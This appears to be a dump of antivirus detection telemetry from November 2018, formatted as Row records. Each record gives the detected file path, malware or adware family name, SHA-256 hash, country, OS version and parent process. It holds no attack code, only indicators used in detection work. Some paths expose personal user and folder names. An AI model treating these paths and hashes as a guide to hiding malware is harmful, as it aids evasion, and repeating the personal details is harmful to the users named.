  Row(detection=Row(filename='tahunan 2016.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\LAPORAN TAHUNAN 2016\\TAHUNAN 2016.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154547-5a90c6e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154547-5A90C6E5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='\\\\?\\C:\\Program Files\\SmartCloudInput\\1.3.6.10910\\SCMiNi.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='4f5d72478c0ea865608bea5bc11b1c4fcacf7272a9921e2aa26027d362cd030c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:08:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155410-af41e1d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155410-AF41E1D0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:27:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:54:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-225502-0b81fec9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91b74da9\\AVSCAN-20181031-225153-F8CF7756\\AVSCAN-20181031-225502-0B81FEC9', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:54:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\backup_log\\msIExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a6702363.exe', filepath='g:\\system volume information\\_restore{c748380e-fdee-4ba8-ac02-d3f7afc441fe}\\rp1689\\A6702363.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='761a47c48a643614c2922c5a7809c64dd06d7caaddc45e060ae9b684506688d1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:34:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110343-c3ad3d8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110343-C3AD3D8D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091434-a7f2204a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c0bde03\\AVSCAN-20181101-090119-0AF3D2E8\\AVSCAN-20181101-091434-A7F2204A', filesize=320000, name='Adware/CsdiMonetize.c07120.#M1.#R1'), hash='c07120a8e5da5aa4e7630f808c1ab151c7a9d5b4a88a781ecbe706ba7ca5283d', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:14:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsg9F7F.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:20:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160050-02a3de41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160002-F84739B4\\AVSCAN-20181101-160050-02A3DE41', filesize=1024000, name='ADWARE/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='puked.exe', filepath='C:\\Windows\\puked.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4502864, timestamp='2018-11-01T16:04:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-225442-097ae2be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91b74da9\\AVSCAN-20181031-225153-F8CF7756\\AVSCAN-20181031-225442-097AE2BE', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:54:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fsquirt.exe', filepath='C:\\Windows\\winsxs\\x86_bth.inf_31bf3856ad364e35_6.1.7601.17514_none_744c2e2719d350a0\\fsquirt.exe', filesize=256000, name='W32/Jeefo.A.#M1.#R1'), hash='bcdbe80ba6d11101b3c2b57bef58bb5e8d6789bdcb5a21b05cc2b41fbeb38d4c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\servicing\\TrustedInstaller.exe', parentsize=204800, timestamp='2018-11-01T11:16:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092428-b9975ceb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e97d068\\AVSCAN-20181101-092410-B6C41C15\\AVSCAN-20181101-092428-B9975CEB', filesize=768000, name='TR/Dropper.Gen.#M1.#R1'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110308-bf424f0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110308-BF424F0B', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111015-f537bef5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111015-F537BEF5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Desktop\\Images\\Pictures\\Pictures.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:IRUtyC\\\\\\/ZIEW+9+\\\\\\/K.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T13:49:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='фотосе.exe', filepath='D:\\фотосе\\фотосе.exe', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gtomb .exe', filepath='\\?\\J:\\العاب\\TOMB\\gTOMB .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='6b540631a5ae50611b1ecf9252f1947ee9f8a510c200c3b6dbdf98ffe9e18691', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instgui.exe', filepath='D:\\documentos\\Downloads\\cj2600en32\\install\\x86\\InstGui.exe', filesize=3584000, name='W32/Stanit.#M1.#R1'), hash='9b7f2ade8c8f824d520b6905e47405c10c2c4a97fb9ab3916b719bd8f34cefed', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:57:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092849-6286dcb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06701062\\AVSCAN-20181101-092644-558CD772\\AVSCAN-20181101-092849-6286DCB9', filesize=192000, name='TR/Crypt.ZPACK.ppgdw.#M1.#R1'), hash='cd6d6e31b9479b31b84242c01aa1562f03a4645e40cfa8284eef8991e8002320', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='overseer.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\avast software\\overseer\\overseer.exe', filesize=1664000, name='W32/Sality.Patched.#M1.#R1'), hash='680994ce4d9dcb697b40aa51d62c5f3128c589b96e6c8720503b3d5e4484bebc', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{52Z1M-JUPYB-MBTG4-BVLNA-YR15D-UCD9A}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6479136, timestamp='2018-11-01T11:12:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='navicat8.exe', filepath='D:\\TDownloads\\Oracle Database 11g Release 2\\Navicat8.for.Oracle\\Navicat8.exe', filesize=256000, name='TR/Dldr.Banload.ayiz.#M1.#R1'), hash='3a137704e3917c211564af0fd9f7201ab6c3211b15c88a301f308e961aee729b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T16:31:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upgrade.exe', filepath='g:\\recycler\\s-1-5-21-1708537768-688789844-1417001333-1003\\dg2\\Upgrade.exe', filesize=384000, name='W32/Ramnit.CD.#M1.#R1'), hash='444c247436674c43fc4f582f05f8e368cf4300b2600839321e7c17206e9c8772', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:16:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.115\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.115\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:12:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T09:41:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered daret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered daret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='303277724f38609bceb633bcc00b942f5e87b0ce735fe749deaa91bf6183e822', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T04:16:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:35:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193655-537f31e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b59c424\\AVSCAN-20181101-193643-51017E8B\\AVSCAN-20181101-193655-537F31E6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000924e1', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000924e1', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:32:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qtwcodecsd4.dll', filepath='d:\\steam\\steamapps\\common\\dota 2 beta\\game\\bin\\win32\\qt_plugins\\codecs\\qtwcodecsd4.dll', filesize=576000, name='W32/Ramnit.C.#M1.#R1'), hash='52ee3b80822eff5e263376a2c5ded1074043a7112ffaf7f8d56bd58da6262c31', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:41:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0127316.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127316.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215137-7b02f5a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b696b0c1\\AVSCAN-20181101-215122-78173F21\\AVSCAN-20181101-215137-7B02F5A9', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='162acb8d677c39bf5e2c87035847d1c699bc6fc193de81c09e03bd252f01eeeb', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:11:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184607-4d6b7275', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_843c7103\\AVSCAN-20181101-184516-46E3EF60\\AVSCAN-20181101-184607-4D6B7275', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='2bd310998055ce78ad91a9f366d94b970fd4b4f4c1de14e3bd57a7fc1de1bbc4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:46:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202628-91425b95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba9e3dde\\AVSCAN-20181101-202602-8D68E1BE\\AVSCAN-20181101-202628-91425B95', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:26:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053407-230bfabb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053407-230BFABB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.626\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.626\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:45:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235942-a65faf1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dd13b79\\AVSCAN-20181101-235114-7A2EFC9A\\AVSCAN-20181101-235942-A65FAF1D', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='44de806114d631ce8fd219b2d3f1f6ebafe60609481ca4c91dcca389d77cf862', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbirdieshoot.exe', filepath='\\?\\J:\\العاب2\\Birdie Shoot\\gBirdieShoot.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='29dfab30cef227d6aa2665b8a9f2f15a8f07d8ea7e5479290dcd14ea837aad8b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002336-3fb1f62b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002336-3FB1F62B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165430-10b6b8c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-165430-10B6B8C1', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:54:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.846\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.846\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:06:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pwfuwurj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\pWFuwURJ.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-01T01:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\AppData\\Local\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='dae7701cb61c8ea6164d982c58b1bb2be2f065bb40bd02f419f3ec1a81ccea4b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\LPT\\srpts.exe', parentsize=32288, timestamp='2018-11-01T09:15:50Z'), dt=datetime.date(2018, 11, 1)),
